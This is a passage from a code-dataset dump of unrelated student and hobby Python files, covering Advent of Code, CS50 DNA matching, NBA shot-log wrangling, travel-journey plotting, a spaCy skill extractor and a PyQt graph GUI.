\n\n\n\n\n","repo_name":"QueensAnnsRevenge/pythnon-student-teacher-system","sub_path":"dataBase.py","file_name":"dataBase.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21444012878","text":"# lazy, dumb solution\n\nwith open(\"input.txt\") as f:\n lines = f.readlines()\n\n# returns the number of differing characters and common characters joined to a string\n# works under the assumption that both strings are the same length\ndef difference(one, two):\n common_chars = [c1 for (c1, c2) in zip(one, two) if c1 == c2]\n\n return len(one) - len(common_chars), \"\".join(common_chars)\n\n# input is small enough that we can brute-force\none_off = [(l1, l2) for l1 in lines for l2 in lines if difference(l1, l2)[0] == 1]\n\nfirst = one_off[0][0]\nsecond = one_off[0][1]\n\nprint(difference(first, second)[1])\n","repo_name":"teschty/aoc2018","sub_path":"day_02/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33686245912","text":"import os\nimport spacy\n\n\nclass NERExtractSkills:\n def __init__(self, model):\n if os.path.exists(model):\n self.model_name = model\n self.nlp = spacy.load(model)\n else:\n raise \"{} file not exist!\".format(model)\n\n def extract_skills(self, text):\n document = self.nlp(text)\n return set(document.ents)\n\n\n\"\"\"def main():\n # model = NERModel(datafile=\"skill_label_data.json\")\n # model.train(epochs=40)\n # model.save_model()\n module1 = NERBasedSkills(model='ner_model')\n data_module = NERData(filename=\"skill_label_data.json\")\n text = data_module.get_training_data()\n print(module1.get_skills(text[0][0]))\n\n\nmain()\"\"\"\n","repo_name":"rawat999/Job_Recommedation","sub_path":"skill_extractor/ner_module/ner.py","file_name":"ner.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28742093163","text":"# Implement a program that identifies a person based on their DNA\nimport csv\nimport sys\n\ndef main():\n\n # Check for command-line usage\n if len(sys.argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n sts.exit(1)\n\n # Read database file into a variable\n people = []\n sequences = []\n with open(sys.argv[1], 'r') as data:\n datareader = csv.DictReader(data)\n\n # Make a list of key values\n sequences = datareader.fieldnames[1:]\n\n for person in datareader:\n # Convert string to int\n for x in sequences:\n person[x] = int(person[x])\n people.append(person)\n\n # Read DNA sequence file into a variable\n sequence = []\n with open(sys.argv[2], 'r') as dna:\n dnareader = csv.reader(dna)\n for dna in dnareader:\n sequence.append(dna)\n\n # Find longest match of each STR in DNA sequence\n match_dict = {}\n for x in sequences:\n match_dict[x] = longest_match(sequence[0][0], x)\n\n # Check database for matching profiles\n for person in people:\n match = 0\n for x in sequences:\n if person[x] == match_dict[x]:\n match += 1\n # If all subsequences matched, print person's name\n if match == len(sequences):\n print(person[\"name\"])\n return\n\n print(\"No match\")\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()\n","repo_name":"SawakoSugimori/CS50","sub_path":"Week6 - Python/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"950110621","text":"import numpy as np\nfrom utils import print_city_map\nfrom utils import extract_coords\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom math import radians, cos, sin, asin, sqrt\nfrom filter_travel_journal import generate_pickled_travel_journal\n\n\n'''\n Select participants \n'''\nparticipant_a = 34\nparticipant_b = 922\n\ndef plot_at_work_locations(df, color, ax):\n global plotted_coordinates\n categories = {\n 'AtWork': 'Work',\n 'AtHome': 'Home',\n 'AtRestaurant': 'Restaurant',\n 'AtRecreation': 'Socialize'\n }\n\n threshold_distance = 200\n\n def is_close_to_plotted_coordinates(latitude, longitude):\n for plotted_latitude, plotted_longitude in plotted_coordinates:\n distance = sqrt((latitude - plotted_latitude)**2 + (longitude - plotted_longitude)**2)\n if distance < threshold_distance:\n return True\n return False\n\n for category, label in categories.items():\n category_df = df[df['currentMode'] == category]\n if category_df.shape[0] > 0:\n unique_latitudes = category_df['latitude'].unique()\n unique_longitudes = category_df['longitude'].unique()\n for latitude, longitude in zip(unique_latitudes, unique_longitudes):\n if (latitude, longitude) not in plotted_coordinates:\n if not is_close_to_plotted_coordinates(latitude, longitude):\n ax.text(latitude, longitude, label, fontsize=10, color='black', alpha=0.9)\n circle = plt.Circle((latitude, longitude), 50, color=color, fill=False)\n ax.add_patch(circle)\n plotted_coordinates.add((latitude, longitude))\n\ndef plot_travel_journeys(df, map, color):\n # Store the coordinates of the previous location\n prev_lat = None\n prev_long = None\n \n for index, row in df.iterrows():\n lat = row['latitude']\n long = row['longitude']\n\n if prev_lat is not None and prev_long is not None:\n\n # Plot a line between current and previous locations\n line = plt.Line2D([prev_lat, lat], [prev_long, long], color=color, alpha=0.25)\n map.add_artist(line)\n\n # Update previous location\n prev_lat = lat\n prev_long = long\n\n\nmax_retries = 2\nretry_count = 0\n\nwhile retry_count < max_retries:\n try:\n with open(f'{participant_a}_journeys.pickle', 'rb') as f:\n result_dict_a = pickle.load(f)\n break # File opened successfully, exit the loop\n except FileNotFoundError:\n if retry_count < max_retries - 1:\n print(f'Pickled file not found - generating new one for participant {participant_a}')\n generate_pickled_travel_journal(participant_a)\n retry_count += 1\n else:\n print(f'Failed to open pickled file after {max_retries} attempts. Aborting.')\n exit()\n # Handle the failure, raise an exception or exit the program\n\nretry_count = 0 # Reset the retry count for participant B\n\nwhile retry_count < max_retries:\n try:\n with open(f'{participant_b}_journeys.pickle', 'rb') as f:\n result_dict_b = pickle.load(f)\n break # File opened successfully, exit the loop\n except FileNotFoundError:\n if retry_count < max_retries - 1:\n print(f'Pickled file not found - generating new one for participant {participant_b}')\n generate_pickled_travel_journal(participant_b)\n retry_count += 1\n else:\n print(f'Failed to open pickled file after {max_retries} attempts. Aborting.')\n exit()\n # Handle the failure, raise an exception or exit the program\n\n# Get the participants apartment ids\ndf_participants_data = pd.read_csv('./csv/participant_data.csv')\n\n# Get the apartments location\ndf_apartments_locations = pd.read_csv('./csv/Apartments.csv')\n\ndf_buildins_locations = pd.read_csv('./csv/Buildings.csv')\n\n# Get the apartments location\ndf_apartments_locations['longitude'], df_apartments_locations['latitude'] = zip(*df_apartments_locations['location'].apply(extract_coords))\ndf_buildins_locations['longitude'], df_buildins_locations['latitude'] = zip(*df_buildins_locations['location'].apply(extract_coords))\n\napartment_id_a = df_participants_data.loc[df_participants_data['participantId'] == participant_a, 'apartmentId']\napartment_id_b = df_participants_data.loc[df_participants_data['participantId'] == participant_b, 'apartmentId']\n\n\napartment_location_a_lat = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_a.iloc[0], 'latitude']\napartment_location_a_long = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_a.iloc[0], 'longitude']\n\napartment_location_b_lat = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_b.iloc[0], 'latitude']\napartment_location_b_long = df_apartments_locations.loc[df_apartments_locations['apartmentId'] == apartment_id_b.iloc[0], 'longitude']\n\ntitle = f'Participant {participant_a} (red) and {participant_b} (blue) travel journeys'\n\nfig, (ax3) = plt.subplots( figsize=(15, 8))\nax3 = print_city_map(ax3)\nax3.set_title(title)\n\nplotted_coordinates = set()\n\n# Access the data in the result_dict\nfor hash_id, stamps in result_dict_a.items():\n # Perform operations on the stamps data\n stamps['longitude'], stamps['latitude'] = zip(*stamps['currentLocation'].apply(extract_coords))\n color = 'red'\n plot_travel_journeys(stamps, ax3, color)\n plot_at_work_locations(stamps, color, ax3)\n\n\n# Access the data in the result_dict\nfor hash_id, stamps in result_dict_b.items():\n # Perform operations on the stamps data\n stamps['longitude'], stamps['latitude'] = zip(*stamps['currentLocation'].apply(extract_coords))\n color = 'blue'\n plot_travel_journeys(stamps, ax3, color)\n plot_at_work_locations(stamps, color, ax3)\n\n\n\nplt.show()\n\n\n\n","repo_name":"rikardv/avda","sub_path":"compare_participant_travels.py","file_name":"compare_participant_travels.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11571626731","text":"# Stat 6021 Final Project Data Wrangling\n# dylan greenleaf (djg3cg)\n\nimport numpy as np\nimport pandas as pd\nimport re\n\ngame_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014.csv\")\ngame_log.describe\ngame_log.EVENTNUM[1] #All data looks to have been properly imported\n\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAshots_2014.csv\")\nshot_log.describe\nshot_log.GAME_ID[1] #All data looks to have been properly imported\n\ngame_log.HOMEDESCRIPTION[1]\ngame_log.VISITORDESCRIPTION[1]\n\ngame_log[\"shot_or_not\"] = np.nan # Initialize new column in shot log where we can store 1 or 0 based on shot taken\n\ngame_log.shot_or_not[7]\ngame_log.HOMEDESCRIPTION[7]\ngame_log.VISITORDESCRIPTION[7]\n\n# test each observation to see if either description contains some reference to a shot being made\nfor i in range(0,len(game_log.shot_or_not)):\n if ('shot' in str(game_log.HOMEDESCRIPTION[i]).lower() or 'layup' in str(game_log.HOMEDESCRIPTION[i]).lower() or 'dunk' in str(game_log.HOMEDESCRIPTION[i]).lower()\n or 'shot' in str(game_log.VISITORDESCRIPTION[i]).lower() or 'layup' in str(game_log.VISITORDESCRIPTION[i]).lower() or 'dunk' in str(game_log.VISITORDESCRIPTION[i]).lower()):\n game_log.loc[i,'shot_or_not'] = 1\n else:\n game_log.loc[i,'shot_or_not'] = 0\n \n# write partially cleaned data set to file just in case program crashes\ngame_log.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_cleaning.csv\", index = False)\n\n\n# create data frame containing only the shot log observations pertaining to a field goal\ngame_log_shots_only = game_log[game_log['shot_or_not'] > 0]\ngame_log_shots_only.describe # we need to reset the index values\ngame_log_shots_only.reset_index(inplace = True)\ngame_log_shots_only.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\", index = False)\n\ngame_log_shots_only = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\")\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAshots_2014_2.csv\")\n\n# convert game clock values to seconds for shot log\nfor i in range(0,len(shot_log.GAME_CLOCK)):\n time = re.split(':', shot_log.loc[i,'GAME_CLOCK'])\n shot_log.loc[i,'GAME_CLOCK'] = int(time[0])*60 + int(time[1])\n\n# convert game clock values to seconds for game log shot observations\nfor i in range(0,len(game_log_shots_only.PCTIMESTRING)):\n time = re.split(':', game_log_shots_only.PCTIMESTRING[i])\n game_log_shots_only.loc[i,'PCTIMESTRING'] = int(time[0])*60 + int(time[1])\n \n# convert game clock values to seconds for entire game log\nfor i in range(0,len(game_log.PCTIMESTRING)):\n time = re.split(':', game_log.PCTIMESTRING[i])\n game_log.loc[i,'PCTIMESTRING'] = int(time[0])*60 + int(time[1])\n\n# use game clock second values calculated above along with the period for each observation\n# to compute a new variable indicating home many seconds are left in the game\nshot_log['Time_left'] = (48-12*shot_log.PERIOD)*60 + shot_log.GAME_CLOCK\ngame_log_shots_only['Time_left'] = (48-12*game_log_shots_only.PERIOD)*60 + game_log_shots_only.PCTIMESTRING\ngame_log['Time_left'] = (48-12*game_log.PERIOD)*60 + game_log.PCTIMESTRING\n\n\n# as it stands, the timeleft is off for corresponding observations of the 2 data frames by a few seconds\n# take the gamelog times left as a reference and set the shotlog times left as the gamelog time that is\n# closest to each time.\n\ngame_log_shots_only = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAgames_2014_just_shots.csv\")\nshot_log = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBAshots_2014_2.csv\")\n\n# Create list of set of all game IDs from 2014\ngames = shot_log.GAME_ID.unique() \ngame_count = 0\nshot_count = 0\n\n# The .loc method fails the first times it's called in the code, so I'm running it here with a dummy variable\nshot_log_dummy = shot_log[shot_log.GAME_ID == games[0]]\nshot_log_dummy.loc[game_count,'Time_left'] = 0\nshot_log_dummy.loc[game_count,'Time_left'] = 0\n\n# Adjust code below to find index of minimum time returned. Then we can check to see if the player ID\n# in the gamelog corresponding to that index is the same as player ID for the shot being considered\n\nfor game in games:\n #print(game) \n shot_count = 0\n game_log_dummy = game_log_shots_only[game_log_shots_only.GAME_ID == game]\n shot_log_dummy = shot_log[shot_log.GAME_ID == game] \n shot_log_dummy = shot_log_dummy.reset_index(drop=True)\n shot_log_dummy2 = shot_log[shot_log.GAME_ID == game]\n shot_log_dummy2 = shot_log_dummy2.reset_index(drop=True)\n while (len(shot_log_dummy) > 1):\n gl_times = game_log_dummy.Time_left\n close_time = min(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[1]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0] \n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[2]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n \n else:\n close_time = sorted(gl_times, key=lambda x:abs(x-shot_log_dummy.Time_left.iloc[0]))[3]\n index = game_log_dummy[game_log_dummy['Time_left'] == close_time].index[0]\n if (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] > 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() or 'pts' in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()): \n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time\n elif (game_log_dummy.loc[index,'PLAYER1_ID'] == shot_log_dummy.PlayerID.iloc[0] and shot_log_dummy.PTS.iloc[0] == 0 and game_log_dummy.loc[index,'shot_or_not'] == 1):\n if('pts' not in str(game_log_dummy.loc[index,'HOMEDESCRIPTION']).lower() and 'pts' not in str(game_log_dummy.loc[index,'VISITORDESCRIPTION']).lower()):\n shot_log_dummy2.loc[shot_count,'Time_left'] = close_time \n \n shot_log_dummy = shot_log_dummy.drop(shot_log_dummy.index[0]) \n shot_count += 1\n #print(shot_count)\n \n if(game_count == 0):\n new_shot_log = shot_log_dummy2\n elif (game_count > 0):\n new_shot_log = pd.concat([new_shot_log,shot_log_dummy2]) \n game_count += 1\n print(game_count)\n\n\n\n\n# add in a shot_or_not variable so that shots don't incorrectly join on other events\nnew_shot_log['shot_or_not'] = 1\n\n\n# left outer join data sets (game_log on left) on the columns for GAME_ID, Time_left, PlayerID, and shot_or_not\n\nnew_game_log = pd.merge(game_log, new_shot_log, how='left', on=['GAME_ID', 'Time_left','PlayerID','shot_or_not'], sort=False)\n \n \nnew_game_log.to_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined.csv\", index = False)\n \n \n\n###################################################################################################\n#\n# Add in last year's FG % for player taking the shot, and FG % allowed for the closest defender\n#\n###################################################################################################\n\nmerged_game_log = pd.read_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined.csv\")\nshots_2013 = pd.read_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBAshots_2013.csv\")\n\n\nshot_attempts = pd.DataFrame(shots_2013.groupby('PlayerID')['FGM'].count())\nshot_attempts['PlayerID'] = shot_attempts.index\n\nshot_made = pd.DataFrame(shots_2013.groupby('PlayerID')['FGM'].sum())\nshot_made['PlayerID'] = shot_made.index\n\ntotal_FGperc = pd.merge(shot_attempts, shot_made, how='left', on=['PlayerID'], sort=False)\ntotal_FGperc['FGperc'] = total_FGperc['FGM_y']/total_FGperc['FGM_x']\n\ntotal_FGperc['shot_or_not'] = 1\n\n\nmerged_game_log = pd.merge(merged_game_log, total_FGperc, how='left', on=['PlayerID','shot_or_not'], sort=False)\n\n######################################################################################\n\ndef_shot_attempts = pd.DataFrame(shots_2013.groupby('CLOSEST_DEFENDER_PLAYER_ID')['FGM'].count())\ndef_shot_attempts['CLOSEST_DEFENDER_PLAYER_ID'] = def_shot_attempts.index\n\ndef_shot_made = pd.DataFrame(shots_2013.groupby('CLOSEST_DEFENDER_PLAYER_ID')['FGM'].sum())\ndef_shot_made['CLOSEST_DEFENDER_PLAYER_ID'] = def_shot_made.index\n\ndef_total_FGperc = pd.merge(def_shot_attempts, def_shot_made, how='left', on=['CLOSEST_DEFENDER_PLAYER_ID'], sort=False)\ndef_total_FGperc['DefFGperc'] = def_total_FGperc['FGM_y']/def_total_FGperc['FGM_x']\n\ndef_total_FGperc['shot_or_not'] = 1\n\n\nmerged_game_log = pd.merge(merged_game_log, def_total_FGperc, how='left', on=['CLOSEST_DEFENDER_PLAYER_ID','shot_or_not'], sort=False)\n\nmerged_game_log.to_csv(\"C:/Users/brian/Documents/UVA/Linear Models/Final Project/NBA_2014_combined_FGperc.csv\", index = False)\n\n\n\n\n\n#########################################################################################\n# Below is the code to add time_in_game variable after data set has been further modified.\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport math\n\nmaster = pd.read_csv(\"/Users/dylan/msds/linear models/Final Project/NBA_2014_combined_FGperc_withposition_subs.csv\")\n\n# Create list of set of all game IDs from 2014\ngames = list(master.GAME_ID.unique())\ngames = games[0:10]\n\n\n#game = games[0]\n\n#master = master[master['GAME_ID'].isin(games)]\n# Create new variable time_sub and initialize it to NA\nmaster['time_sub'] = np.NaN\n\n\nfor game in games:\n print(game)\n game_events = master[master['GAME_ID'] == game]\n players = list(master[master['GAME_ID'] == game].PlayerID.unique())\n for player in players:\n #print(player)\n events1 = game_events[game_events['PlayerID'] == player]\n events1 = events1[events1['Time_left'] >= 1440] \n events2 = game_events[game_events['PlayerID'] == player]\n events2 = events2[events2['Time_left'] < 1440]\n indices1 = events1.index.get_values()\n indices2 = events2.index.get_values()\n for i in range(0, len(events1)):\n index = indices1[i]\n if (events1.shot_or_not[index] == 0):\n continue\n else:\n sub_i = np.NaN\n if(len(events1[events1['SUBIN'] == player])>0):\n sub_i = events1[events1['SUBIN'] == player]\n sub_i = sub_i[sub_i['SUBIN'].index < i]\n sub_i = sorted(sub_i, reverse = True)[0]\n if (np.isnan(sub_i) != True):\n master.loc[index, 'time_sub'] = events1.loc[sub_i, 'Time_left'] - events1.loc[index, 'Time_left']\n else:\n master.loc[index, 'time_sub'] = 2880 - events1.loc[index, 'Time_left']\n \n for i in range(0, len(events2)):\n index = indices2[i]\n if (events2.shot_or_not[index] == 0):\n continue\n else:\n sub_i = np.NaN\n if(len(events2[events2['SUBIN'] == player])>0):\n sub_i = events2[events2['SUBIN'] == player]\n sub_i = sub_i[sub_i['SUBIN'].index < index]\n sub_i = sorted(sub_i, reverse = True)[0]\n if (np.isnan(sub_i) != True):\n master.loc[index, 'time_sub'] = events2.loc[sub_i, 'Time_left'] - events2.loc[index, 'Time_left']\n else:\n master.loc[index, 'time_sub'] = 1440 - events2.loc[index, 'Time_left']\n \n\n# Fill in missing scoremargin values with previous score\nmaster['SCOREMARGIN'] = master['SCOREMARGIN'].fillna(method = 'ffill')\n\n# Flip the margin values for the away team so each margin shows how much the team shooting is down\nfor i in range(0,len(master)):\n if (master.loc[i,'LOCATION'] == 'A'):\n if (master.loc[i, 'SCOREMARGIN'] == 'TIE'):\n break\n elif np.isnan(int(master.loc[i, 'SCOREMARGIN'])):\n break\n else:\n master.loc[i, 'SCOREMARGIN'] = -(int(master.loc[i,'SCOREMARGIN'])) \n\n\n\n# Export master to csv file\nmaster.to_csv(\"/Users/dylan/msds/linear models/Final Project/NBA_2014_Final_Combined\", index = False) \n \n \n\n\n \n \n \n","repo_name":"dannydongheon93/NBA-FG-Prediction-Model","sub_path":"nba_wrangling_final.py","file_name":"nba_wrangling_final.py","file_ext":"py","file_size_in_byte":15291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7973673762","text":"arranque = 0\nenclavamiento = 0\nparo = 0\nestado = 0\n\ndef setup():\n pinMode(2, INPUT)\n pinMode(0, INPUT)\n pinMode(13, OUTPUT)\n pinMode(5, OUTPUT)\n\ndef loop():\n global arranque, enclavamiento, paro, estado\n arranque = digitalRead(2)\n paro = digitalRead(0)\n enclavamiento = estado\n if arranque == HIGH:\n estado = 1\n if estado == 1:\n digitalWrite(13, LOW)\n digitalWrite(5, HIGH)\n print(\"encendido el 5\")\n else:\n digitalWrite(13, HIGH)\n digitalWrite(5, LOW)\n print(\"encendido el 13\")\n if paro == HIGH:\n estado = 0","repo_name":"Dispositivos-Edificio-Bioclimatico/ejemplos_librerias","sub_path":"CODIGOS PARA PYTHON/base_de_enclavamiento/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70744636484","text":"import sleep\nimport requests\n\nSERVER_URL = \"http://ajfjf:8000\"\n\ndef go():\n while True:\n r = requests.get(f\"{SERVER_URL}/status\")\n if r.text == \"PLAY_SONG\":\n break\n sleep(0.1)\n \n # play the song\n print(\"PLAYING THE SONG\")","repo_name":"lhorgan/xmas","sub_path":"laptop/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36134831866","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Graph program\")\n Dialog.resize(390, 300)\n Dialog.setFixedSize(390, 300)\n\n self.generateComboBox = QtWidgets.QComboBox(Dialog)\n self.generateComboBox.setGeometry(QtCore.QRect(210, 10, 175, 25))\n self.generateComboBox.setObjectName(\"generateComboBox\")\n self.generateComboBox.addItem(\"\")\n self.generateComboBox.addItem(\"\")\n self.generateComboBox.addItem(\"\")\n self.generateLabel = QtWidgets.QLabel(Dialog)\n self.generateLabel.setGeometry(QtCore.QRect(10, 10, 180, 25))\n self.generateLabel.setObjectName(\"generateLabel\")\n\n self.attackLabel = QtWidgets.QLabel(Dialog)\n self.attackLabel.setGeometry(QtCore.QRect(10, 40, 180, 25))\n self.attackLabel.setObjectName(\"attackLabel\")\n self.attackComboBox = QtWidgets.QComboBox(Dialog)\n self.attackComboBox.setGeometry(QtCore.QRect(210, 40, 175, 25))\n self.attackComboBox.setObjectName(\"attackComboBox\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n self.attackComboBox.addItem(\"\")\n\n self.sizeLabel = QtWidgets.QLabel(Dialog)\n self.sizeLabel.setGeometry(QtCore.QRect(10, 70, 180, 25))\n self.sizeLabel.setObjectName(\"sizeLabel\")\n self.sizeBox = QtWidgets.QSpinBox(Dialog)\n self.sizeBox.setGeometry(QtCore.QRect(210, 70, 175, 25))\n self.sizeBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))\n self.sizeBox.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.sizeBox.setAutoFillBackground(False)\n self.sizeBox.setMaximum(10000)\n self.sizeBox.setProperty(\"value\", 100)\n self.sizeBox.setObjectName(\"sizeBox\")\n\n self.rewritingBox = QtWidgets.QSpinBox(Dialog)\n self.rewritingBox.setGeometry(QtCore.QRect(210, 100, 175, 25))\n self.rewritingBox.setMinimum(1)\n self.rewritingBox.setProperty(\"value\", 5)\n self.rewritingBox.setObjectName(\"rewritingBox\")\n self.nodesLabel = QtWidgets.QLabel(Dialog)\n self.nodesLabel.setGeometry(QtCore.QRect(10, 100, 200, 25))\n self.nodesLabel.setObjectName(\"nodesLabel\")\n\n self.retryBox = QtWidgets.QSpinBox(Dialog)\n self.retryBox.setGeometry(QtCore.QRect(210, 130, 175, 25))\n self.retryBox.setMaximum(10000)\n self.retryBox.setProperty(\"value\", 1000)\n self.retryBox.setObjectName(\"retryBox\")\n self.retryLabel = QtWidgets.QLabel(Dialog)\n self.retryLabel.setGeometry(QtCore.QRect(10, 130, 200, 16))\n self.retryLabel.setObjectName(\"retryLabel\")\n\n self.seedBox = QtWidgets.QSpinBox(Dialog)\n self.seedBox.setEnabled(False)\n self.seedBox.setGeometry(QtCore.QRect(210, 160, 175, 25))\n self.seedBox.setObjectName(\"seedBox\")\n self.seedCheckBox = QtWidgets.QCheckBox(Dialog)\n self.seedCheckBox.setGeometry(QtCore.QRect(190, 160, 16, 25))\n self.seedCheckBox.setText(\"\")\n self.seedCheckBox.setObjectName(\"seedCheckBox\")\n self.seedLabel = QtWidgets.QLabel(Dialog)\n self.seedLabel.setGeometry(QtCore.QRect(10, 160, 180, 25))\n self.seedLabel.setObjectName(\"seedLabel\")\n\n self.progressBar = QtWidgets.QProgressBar(Dialog)\n self.progressBar.setEnabled(False)\n self.progressBar.setGeometry(QtCore.QRect(10, 200, 380, 25))\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n\n self.startButton = QtWidgets.QPushButton(Dialog)\n self.startButton.setGeometry(QtCore.QRect(145, 250, 100, 25))\n self.startButton.setObjectName(\"startButton\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle('Graphs')\n Dialog.setWindowIcon(QIcon('main.png'))\n self.startButton.setText(_translate(\"Dialog\", \"Start\"))\n self.generateLabel.setText(_translate(\"Dialog\", \"Метод генерации графа\"))\n self.attackLabel.setText(_translate(\"Dialog\", \"Метод атаки на граф\"))\n self.sizeLabel.setText(_translate(\"Dialog\", \"Количество вершин у графа\"))\n self.generateComboBox.setItemText(0, _translate(\"Dialog\", \"Случайный\"))\n self.generateComboBox.setItemText(1, _translate(\"Dialog\", \"Барабаши-Альберт\"))\n self.generateComboBox.setItemText(2, _translate(\"Dialog\", \"Ватц-Строгац\"))\n 